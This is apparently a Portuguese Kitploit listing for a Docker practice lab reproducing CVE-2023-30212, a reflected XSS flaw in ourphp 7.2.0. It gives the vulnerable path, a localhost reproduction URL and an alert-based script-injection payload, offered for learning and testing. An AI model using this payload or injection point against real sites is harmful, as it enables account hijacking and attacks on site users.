Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — Este repositório fornece um contêiner Docker para simular a vulnerabilidade CVE-2023-30212, permitindo que você pratique e entenda seu impacto. Ele inclui um guia abrangente para ajudá-lo a configurar o contêiner em seu próprio computador. A documentação do processo de criação do Docker também está incluída. | Kitploit
Ferramentas/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e EducaçãoLabs e Prática
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

Ver Repositório
111há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este repositório fornece um contêiner Docker para simular a vulnerabilidade CVE-2023-30212, permitindo que você pratique e entenda seu impacto. Ele inclui um guia abrangente para ajudá-lo a configurar o contêiner em seu próprio computador. A documentação do processo de criação do Docker também está incluída.

Compartilhar

CVE-2023-30212 POC : Cross-Site Scripting

via /client/manage/ourphp_out.php

Produtos afetados pelo CVE-2023-30212 :

FornecedorProdutoVersão
ourphpourphp7.2.0

Guia de instalação Docker :

Para instalar o OURPHP <= 7.2.0 no docker, você pode usar o guia para instalar o docker para fins de prática.

Explicação da vulnerabilidade:

root@kitploit:~
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

Passos para reproduzir o problema:

root@kitploit:~
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Payload para a vulnerabilidade:

root@kitploit:~
# </script><script>alert(`xss`)</script>

Vídeo

CVE-2023-30212

Referências

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> Código para referência
Baixar ferramenta